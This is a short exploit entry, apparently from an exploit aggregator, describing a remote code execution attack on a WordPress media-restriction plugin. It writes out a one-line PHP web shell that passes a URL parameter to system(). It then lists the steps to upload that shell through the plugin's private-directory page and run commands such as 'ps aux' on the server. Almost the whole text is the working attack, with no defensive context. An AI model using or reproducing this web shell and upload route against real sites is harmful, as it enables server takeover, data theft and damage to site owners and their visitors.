## https://sploitus.com/exploit?id=WPEX-ID:53816136-4B1A-4B7D-B73B-08A90C2A638F
1) Create a PHP file `cmd.php` with the contents `<?php system($_GET['cmd']); ?>`
2) Go to https://example.com/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
3) Then upload a file with the PHP extension
4) Follow the link https://example.com/wp-content/uploads/protectedfiles/{filename}.php?cmd=ps+aux
5) You will be able to see a list of processes when the PHP is executed